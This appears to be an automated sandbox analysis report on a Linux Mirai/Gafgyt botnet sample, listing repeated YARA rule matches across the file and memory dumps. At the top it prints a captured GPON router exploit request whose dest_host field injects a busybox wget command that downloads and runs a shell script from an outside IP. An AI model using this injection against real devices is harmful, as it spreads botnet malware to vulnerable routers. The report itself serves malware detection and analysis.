      Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 38 32 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://141.98.10.82/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

      System Summary

      barindex
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: enYTIDNSNe.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
